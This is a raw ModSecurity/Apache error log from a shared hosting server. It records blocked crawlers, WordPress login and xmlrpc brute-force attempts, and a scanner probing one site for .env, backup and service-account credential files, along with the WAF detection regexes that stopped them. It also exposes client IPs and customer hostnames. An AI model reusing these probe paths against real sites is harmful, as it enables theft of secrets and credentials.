[Tue May 26 16:34:38.708704 2026] [security2:error] [pid 808625:tid 808850] [client 185.191.171.13:31074] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-08-18/"] [unique_id "ahV-RjEl_SBaWibfDmpd0AAAAF8"]
[Tue May 26 16:34:38.817811 2026] [security2:error] [pid 808625:tid 808827] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-RjEl_SBaWibfDmpdyAAAAEg"]
[Tue May 26 16:34:39.937580 2026] [security2:error] [pid 808625:tid 808746] [remote 54.38.29.86:60050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV-RzEl_SBaWibfDmpd7AAAVXg"]
[Tue May 26 16:34:40.299664 2026] [security2:error] [pid 808625:tid 808795] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-RzEl_SBaWibfDmpd7wAAACg"]
[Tue May 26 16:34:40.457517 2026] [security2:error] [pid 808625:tid 808843] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SDEl_SBaWibfDmpeBAAAAFg"]
[Tue May 26 16:34:41.154839 2026] [security2:error] [pid 808625:tid 808854] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-STEl_SBaWibfDmpeGQAAAGM"]
[Tue May 26 16:34:41.161511 2026] [security2:error] [pid 808625:tid 808806] [client 117.198.37.168:57642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-STEl_SBaWibfDmpeHgAAADM"]
[Tue May 26 16:34:41.161615 2026] [security2:error] [pid 808625:tid 808806] [client 117.198.37.168:57642] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-STEl_SBaWibfDmpeHgAAADM"]
[Tue May 26 16:34:41.277460 2026] [security2:error] [pid 808625:tid 808727] [remote 178.104.164.71:37096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV-STEl_SBaWibfDmpeGgAASmU"]
[Tue May 26 16:34:41.396145 2026] [security2:error] [pid 808625:tid 808812] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-STEl_SBaWibfDmpeIQAAADk"]
[Tue May 26 16:34:41.970449 2026] [security2:error] [pid 808625:tid 808822] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-STEl_SBaWibfDmpeMAAAAEM"]
[Tue May 26 16:34:42.233477 2026] [security2:error] [pid 808625:tid 808852] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SjEl_SBaWibfDmpeOQAAAGE"]
[Tue May 26 16:34:42.494354 2026] [security2:error] [pid 808625:tid 808797] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SjEl_SBaWibfDmpePwAAACo"]
[Tue May 26 16:34:42.690841 2026] [security2:error] [pid 808625:tid 808739] [remote 178.156.182.155:51928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahV-SjEl_SBaWibfDmpeQAAABXE"]
[Tue May 26 16:34:42.773412 2026] [security2:error] [pid 808625:tid 808774] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SjEl_SBaWibfDmpeSgAAABM"]
[Tue May 26 16:34:43.028392 2026] [security2:error] [pid 808625:tid 808879] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SjEl_SBaWibfDmpeTQAAAHw"]
[Tue May 26 16:34:43.289605 2026] [security2:error] [pid 808625:tid 808768] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SzEl_SBaWibfDmpeVgAAAA0"]
[Tue May 26 16:34:43.547965 2026] [security2:error] [pid 808625:tid 808840] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SzEl_SBaWibfDmpeYgAAAFU"]
[Tue May 26 16:34:43.600558 2026] [security2:error] [pid 808625:tid 808806] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-SzEl_SBaWibfDmpeUwAAADM"]
[Tue May 26 16:34:43.872474 2026] [security2:error] [pid 808625:tid 808857] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-SzEl_SBaWibfDmpeZQAAAGY"]
[Tue May 26 16:34:44.151237 2026] [security2:error] [pid 808625:tid 808799] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TDEl_SBaWibfDmpeaAAAACw"]
[Tue May 26 16:34:44.393056 2026] [security2:error] [pid 808625:tid 808878] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TDEl_SBaWibfDmpedAAAAHs"]
[Tue May 26 16:34:44.397486 2026] [autoindex:error] [pid 808625:tid 808861] [client 20.17.180.16:63074] AH01276: Cannot serve directory /home2/shard164/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:34:44.452466 2026] [security2:error] [pid 808625:tid 808869] [client 45.45.237.225:39242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "divinternationalcourier.in"] [uri "/.env"] [unique_id "ahV-TDEl_SBaWibfDmpeegAAAHI"]
[Tue May 26 16:34:44.452583 2026] [security2:error] [pid 808625:tid 808869] [client 45.45.237.225:39242] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "divinternationalcourier.in"] [uri "/.env"] [unique_id "ahV-TDEl_SBaWibfDmpeegAAAHI"]
[Tue May 26 16:34:44.496967 2026] [security2:error] [pid 808625:tid 808834] [client 45.45.237.225:39336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "divinternationalcourier.in"] [uri "/service-account.json"] [unique_id "ahV-TDEl_SBaWibfDmpegwAAAE8"]
[Tue May 26 16:34:44.496970 2026] [security2:error] [pid 808625:tid 808791] [client 45.45.237.225:39446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "divinternationalcourier.in"] [uri "/config.json"] [unique_id "ahV-TDEl_SBaWibfDmpeggAAACQ"]
[Tue May 26 16:34:44.497117 2026] [security2:error] [pid 808625:tid 808834] [client 45.45.237.225:39336] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "divinternationalcourier.in"] [uri "/service-account.json"] [unique_id "ahV-TDEl_SBaWibfDmpegwAAAE8"]
[Tue May 26 16:34:44.497122 2026] [security2:error] [pid 808625:tid 808791] [client 45.45.237.225:39446] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "divinternationalcourier.in"] [uri "/config.json"] [unique_id "ahV-TDEl_SBaWibfDmpeggAAACQ"]
[Tue May 26 16:34:44.497976 2026] [security2:error] [pid 808625:tid 808802] [client 45.45.237.225:39404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.backup"] [unique_id "ahV-TDEl_SBaWibfDmpehAAAAC8"]
[Tue May 26 16:34:44.499216 2026] [security2:error] [pid 808625:tid 808841] [client 45.45.237.225:39376] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.bak"] [unique_id "ahV-TDEl_SBaWibfDmpegAAAAFY"]
[Tue May 26 16:34:45.147050 2026] [security2:error] [pid 808625:tid 808804] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TTEl_SBaWibfDmperQAAADE"]
[Tue May 26 16:34:45.645888 2026] [security2:error] [pid 808625:tid 808851] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-TDEl_SBaWibfDmpeoQAAAGA"]
[Tue May 26 16:34:45.850133 2026] [security2:error] [pid 808625:tid 808856] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TTEl_SBaWibfDmpevQAAAGU"]
[Tue May 26 16:34:46.008778 2026] [security2:error] [pid 808625:tid 808841] [client 45.45.237.225:39226] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "divinternationalcourier.in"] [uri "/tracking.html"] [unique_id "ahV-TjEl_SBaWibfDmpewQAAAFY"]
[Tue May 26 16:34:46.008895 2026] [security2:error] [pid 808625:tid 808841] [client 45.45.237.225:39226] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "divinternationalcourier.in"] [uri "/tracking.html"] [unique_id "ahV-TjEl_SBaWibfDmpewQAAAFY"]
[Tue May 26 16:34:46.102746 2026] [security2:error] [pid 808625:tid 808775] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TjEl_SBaWibfDmpexwAAABQ"]
[Tue May 26 16:34:46.356867 2026] [security2:error] [pid 808625:tid 808846] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TjEl_SBaWibfDmpezgAAAFs"]
[Tue May 26 16:34:46.608695 2026] [security2:error] [pid 808625:tid 808840] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TjEl_SBaWibfDmpe2gAAAFU"]
[Tue May 26 16:34:46.881012 2026] [security2:error] [pid 808625:tid 808873] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TjEl_SBaWibfDmpe4QAAAHY"]
[Tue May 26 16:34:47.144074 2026] [security2:error] [pid 808625:tid 808766] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TzEl_SBaWibfDmpe6gAAAAs"]
[Tue May 26 16:34:47.236354 2026] [security2:error] [pid 808625:tid 808759] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-TjEl_SBaWibfDmpe0QAAAAQ"]
[Tue May 26 16:34:47.404883 2026] [security2:error] [pid 808625:tid 808861] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TzEl_SBaWibfDmpe8AAAAGo"]
[Tue May 26 16:34:47.664972 2026] [security2:error] [pid 808625:tid 808833] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TzEl_SBaWibfDmpe9wAAAE4"]
[Tue May 26 16:34:47.930582 2026] [security2:error] [pid 808625:tid 808775] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-TzEl_SBaWibfDmpfAQAAABQ"]
[Tue May 26 16:34:48.192544 2026] [security2:error] [pid 808625:tid 808770] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UDEl_SBaWibfDmpfBwAAAA8"]
[Tue May 26 16:34:48.457112 2026] [security2:error] [pid 808625:tid 808810] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UDEl_SBaWibfDmpfEwAAADc"]
[Tue May 26 16:34:48.550914 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-TzEl_SBaWibfDmpe_wAAAGs"]
[Tue May 26 16:34:48.734014 2026] [security2:error] [pid 808625:tid 808863] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UDEl_SBaWibfDmpfGQAAAGw"]
[Tue May 26 16:34:49.018531 2026] [security2:error] [pid 808625:tid 808766] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UDEl_SBaWibfDmpfHAAAAAs"]
[Tue May 26 16:34:49.287146 2026] [security2:error] [pid 808625:tid 808878] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UTEl_SBaWibfDmpfIgAAAHs"]
[Tue May 26 16:34:49.545106 2026] [security2:error] [pid 808625:tid 808872] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UTEl_SBaWibfDmpfKQAAAHU"]
[Tue May 26 16:34:49.800299 2026] [security2:error] [pid 808625:tid 808867] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UTEl_SBaWibfDmpfNgAAAHA"]
[Tue May 26 16:34:50.059201 2026] [security2:error] [pid 808625:tid 808828] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UTEl_SBaWibfDmpfQAAAAEk"]
[Tue May 26 16:34:50.317745 2026] [security2:error] [pid 808625:tid 808769] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UjEl_SBaWibfDmpfSwAAAA4"]
[Tue May 26 16:34:50.571098 2026] [security2:error] [pid 808625:tid 808776] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UjEl_SBaWibfDmpfVQAAABU"]
[Tue May 26 16:34:50.828837 2026] [security2:error] [pid 808625:tid 808819] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UjEl_SBaWibfDmpfWwAAAEA"]
[Tue May 26 16:34:51.085347 2026] [security2:error] [pid 808625:tid 808829] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UzEl_SBaWibfDmpfXgAAAEo"]
[Tue May 26 16:34:51.341508 2026] [security2:error] [pid 808625:tid 808867] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UzEl_SBaWibfDmpfagAAAHA"]
[Tue May 26 16:34:51.405497 2026] [security2:error] [pid 808625:tid 808879] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-UjEl_SBaWibfDmpfUQAAAHw"]
[Tue May 26 16:34:51.596789 2026] [security2:error] [pid 808625:tid 808799] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UzEl_SBaWibfDmpfcQAAACw"]
[Tue May 26 16:34:51.876376 2026] [security2:error] [pid 808625:tid 808828] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-UzEl_SBaWibfDmpfdAAAAEk"]
[Tue May 26 16:34:52.131390 2026] [security2:error] [pid 808625:tid 808782] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VDEl_SBaWibfDmpffgAAABs"]
[Tue May 26 16:34:52.196891 2026] [security2:error] [pid 808625:tid 808788] [client 117.198.37.168:57952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-VDEl_SBaWibfDmpffwAAACE"]
[Tue May 26 16:34:52.197067 2026] [security2:error] [pid 808625:tid 808788] [client 117.198.37.168:57952] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-VDEl_SBaWibfDmpffwAAACE"]
[Tue May 26 16:34:52.205466 2026] [security2:error] [pid 808625:tid 808839] [client 103.215.74.72:17140] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mosykay.com"] [uri "/action"] [unique_id "ahV-VDEl_SBaWibfDmpfggAAAFQ"]
